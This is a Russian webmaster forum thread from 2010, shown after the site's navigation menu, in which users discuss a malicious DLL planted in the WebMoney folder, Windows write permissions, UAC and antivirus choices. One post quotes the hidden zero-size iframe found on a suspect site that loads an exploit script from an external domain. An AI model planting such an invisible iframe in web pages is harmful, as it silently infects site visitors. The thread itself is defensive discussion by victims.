- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
C:\Program Files\WebMoney\inetmib1.dll
Версия виндов Windows XP SP2 ?
В SP3 вроде как в Program Files молча уже ничего записать нельзя даже под админом (погорячился...)!
А также опять вопрос
1. зачем работать под админом?
2. почему Касперский а не Avast у которого есть ф-ия запрета записи dll на диск?
3. Лиса?
крутотень! 75 страниц туфты! Молодцы парни лабайте дальше.
LEOnidUKG добавил 02.04.2010 в 14:25
В SP3 вроде как в Program Files молча уже ничего записать нельзя даже под админом!
Это как? т.е. если я буду копировать файл ctrl+c ctrl+v он у меня какой-то вопрос будет задавать? требовать смс отправить? 😂
он скажет нет прав. Права на запись туда остались только у службы инсталятора msi
Хотя возможо погорячился, спутал с Юзером, сейчас поставлю лицензию XP SP2 обновлю до SP3 и проверю, не левой сборке это так, но не факто что под лицензией. Но Avast железно блокирует запись исполняемых, точно помню проверял на XP SP2 SP3 Vista
Да LEOnidUKG прав, лицензия XP SP3 ничего не спрашивает, жесть, ну и дыра эта XP. Vista для записи в програм файлс спрашивает подтверждения прав админа даже если юзер и есть админ (UAC). Т.е. под вистой в папку вебманей левый длл не запихать...
urod.ru скорее всего содержал сплоит, процентов на 90% я уверен что хапнул именно оттуда
добавил......
вот что там висит щас
<noindex><iframe src="http://trfistb.info/for.cgi?tank" width="0" height="0" style="visibility: hidden;"></iframe></noindex>
Нормально?
угу, оно. бился в ограниченном аккаунте, как тигр в клетке. мозилу мне подвесил. если б умел привилегии повышать - полностью бы овладел той виртуальной машинкой, где запускался :)
а тело удалось посмотреть? интересно какие дыры в лисе используются?
Сам не рискнул... :-O
Да LEOnidUKG прав, лицензия XP SP3 ничего не спрашивает, жесть, ну и дыра эта XP. Vista для записи в програм файлс спрашивает подтверждения прав админа даже если юзер и есть админ (UAC). Т.е. под вистой в папку вебманей левый длл не запихать...
Это сработает, если на рут стоит пароль, иначе дохлый номер. Да и вырубают люди этот UAC поголовно, я один из них 🤪
а тело удалось посмотреть? интересно какие дыры в лисе используются?
А смысл его рассматривать? Завтра-послезавтра оно уже другое будет. Оно живет в до тех пор, пока онлайновая проверка не покажет его наличие в основных антивирусных базах. Там ведь конвейер, почище чем конвейер по выпечке ГС.
Симантек правда ругнулся, но как-то невнятно.
каким образом можно повлиять на этого пи*ара что хостит ифрейм а также дальше по цепочке? есть возможность стукнуть куда нужно? отдел К или еще что?
Да и вырубают люди этот UAC поголовно, я один из них
На Windows 7 UAC вполне вменяемый.
На Windows 7 UAC вполне вменяемый.
Подтверждаю, Windows 7 х64 - абсолютно не напрягает. Ну кликнешь раз в день на предупреждение. Конечно, если не являешься тестировщиком программ и переставляешь их многократно.